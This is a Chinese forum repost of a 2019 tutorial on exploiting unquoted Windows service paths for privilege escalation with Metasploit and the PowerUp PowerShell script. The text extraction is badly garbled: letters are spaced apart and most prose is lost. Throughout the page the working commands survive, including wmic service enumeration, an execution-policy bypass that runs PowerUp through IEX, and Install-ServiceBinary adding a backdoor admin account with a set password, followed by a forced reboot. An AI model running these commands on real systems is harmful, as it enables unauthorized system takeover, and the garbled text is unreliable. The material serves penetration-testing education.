搜索

[26871] 2019-12-09_metasploit、powershell之Windows错误系统配置漏洞实战提权

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-19
2019-12-09_metasploit、powershell之Windows错误系统配置漏洞实战提权 m e t a s p l o i t p o w e r s h e l l W i n d o w s     M s 0 8 0 6 7   2 0 1 9 - 1 2 - 0 9 T r u s t e d   S e r v i c e   P a t h s T r u s t e d   S e r v i c e   P a t h s T r u s t e d   S e r v i c e   P a t h s C r e a t e P r o c e s s w i n d o w s / / T r u s t e d   S e r v i c e   P a t h s w i n d o w s S y s t e m : w i n d o w s w i n d o w s s y s t e m ( ) M e t a s p l o i t T r u s t e d   S e r v i c e   P a t h s m e t e r p r e t e r   s h e l l s h u t e e r s y s t e m 1 T r u s t e d S e r v i c e   P a t h s C : P r o g r a m   F i l e s S o m e   F o l d e r S e r v i c e . e x e C : P r o g r a m . e x e C : P r o g r a m   F i l e s S o m e . e x e C : P r o g r a m   F i l e s S o m e   F o l d e r S e r v i c e . e x e
1   1 . m e t e r p r e t e r   s h e l l s h e l l c m d 使 w m i ( w i n d o w s ) 2 2 V u l n e r a b l e   S e r v i c e O m n i S e r v O m n i S e r v e r O m n i S e r v e r s 2 . 使 W i n d o w s i c a c l s 3 3   w m i c   s e r v i c e   g e t   n a m e , d i s p l a y n a m e , p a t h n a m e , s t a r t m o d e   | f i n d s t r   / i   " A u t o "   | f i n d s t r   / i   / v   " C : W i n d o w s "   | f i n d s t r   / i   / v   " " " C : P r o g r a m   F i l e s C : P r o g r a m   F i l e s C o m m o n   F i l e s C : P r o g r a m   F i l e s C o m m o n   F i l e s m i c r o s o f t   s h a r e d
E v e r y o n e O I C I F 4 4   E v e r y o n e M F C I 访 O I 访 3 . 便 M e t a s p l o i t W i n d o w s   S e r v i c e   T r u s t e d   P a t h   P r i v i l e g e E s c a l a t i o n b a c k g r o u n d , m e t e r p r e t e r   s h e l l M e t a s p l o i t t r u s t e d _ s e r v i c e _ p a t h 5 5 E X P L O I T 4 . 使 e x p l o i t 6 6 5 . r u n m e t e r p r e t e r m e t e r p r e t e r   s h e l l g e t u i d   s y s t e m   C : P r o g r a m   F i l e s P r o g r a m   F o l d e r
7 7 s e s s i o n s 2 m e t e r p r e t e r I D 3 8 8 s e s s i o n s 使 6 . W i n d o w s J A V A J A V A O r a c l e J A V A J A V A P o w e r U p P o w e r s h e l l - P o w e r u p P o w e r u p 9 h t t p s : / / g i t h u b . c o m / P o w e r S h e l l E m p i r e / P o w e r T o o l s / t r e e / m a s t e r / P o w e r U p
9   s h e l l C M D 使 1 0 1 0   使 I E X 1 1 - N o P r o f i l e ( - N o P ) P o w e r S h e l l - E x e c   B y p a s s : I m p o r t - M o d u l e p o w e r s h e l l . e x e   - e x e c   b y p a s s   - C o m m a n d   " &   { I m p o r t - M o d u l e   . P o w e r U p . p s 1 ;   I n v o k e - A l l C h e c k s } " p o w e r s h e l l   - n o p   - e x e c   b y p a s s   - c   I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' c : / P o w e r U p . p s 1 ' ) ; I n v o k e - A l l C h e c k s
1 1   P o w e r u p A b u s e F u n c t i o n G e t - S e r v i c e U n q u o t e d V u l n e r a b l e   S e r v i c e O m n i S e r v O m n i S e r v e r O m n i S e r v e r s , G e t - S e r v i c e F i l e P e r m i s s i o n O m n i S e r v e r s 使 i c a c l s P o w e r U p 1 2 1 2   1 3 C : P r o g r a m   F i l e s E x e c u t a b l e . e x e C : P r o g r a m   F i l e s C o m m o n   F i l e s m i c r o s o f t   s h a r e d O m n i S e r v . e x e C : P r o g r a m   F i l e s C o m m o n   F i l e s A   S u b f o l d e r O m n i S e r v e r . e x e C : P r o g r a m   F i l e s P r o g r a m   F o l d e r A   S u b f o l d e r O m n i S e r v e r s . e x e
1 3   O m n i S e r v e r s . e x e O m n i S e r v e r s . e x e M S F s y s t e m m e t e r p r e t e r 使 1 1 A b u s e F u n c t i o n 1 4 I n s t a l l - S e r v i c e B i n a r y W r i t e - S e r v i c e B i n a r y C # 1 4 1 5 1 5   访 U S E R 使 1 6 S h u t d o w n   r   f   t   0 1 6   1 7 p o w e r s h e l l   - n o p   - e x e c   b y p a s s   I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' c : / P o w e r U p . p s 1 ' ) ; I n s t a l l - S e r v i c e B i n a r y   - S e r v i c e N a m e   ' O m n i S e r v e r s ' - U s e r N a m e   s h u t e e r   - P a s s w o r d   P a s s w o r d 1 2 3 !
1 7 s h u t e e r P a s s w o r d 1 2 3 ! 1 8 1 8   1 9 1 9   2 0 C : P r o g r a m   F i l e s P r o g r a m   F o l d e r A   S u b f o l d e r
2 0   使 T h e E n d .   s h u t e e r 稿 稿 h t t p s : / / i t e m . j d . c o m / 1 2 7 4 3 2 1 0 . h t m l p o w e r s h e l l   - n o p   - e x e c   b y p a s s   I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' c : / P o w e r U p . p s 1 ' ) ; R e s t o r e - S e r v i c e B i n a r y   - S e r v i c e N a m e ' O m n i S e r v e r s ' C : P r o g r a m   F i l e s P r o g r a m   F o l d e r A   S u b f o l d e r O m n i S e r v e r s . e x e . b a k C : P r o g r a m   F i l e s P r o g r a m   F o l d e r A   S u b f o l d e r O m n i S e r v e r s . e x e C : P r o g r a m   F i l e s P r o g r a m   F o l d e r A   S u b f o l d e r O m n i S e r v e r s . e x e . b a k
M s 0 8 0 6 7 W e b 2 0 1 9 1 1 P y t h o n J A V A C T F A P T w w w . m s 0 8 0 6 7 . c o m
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理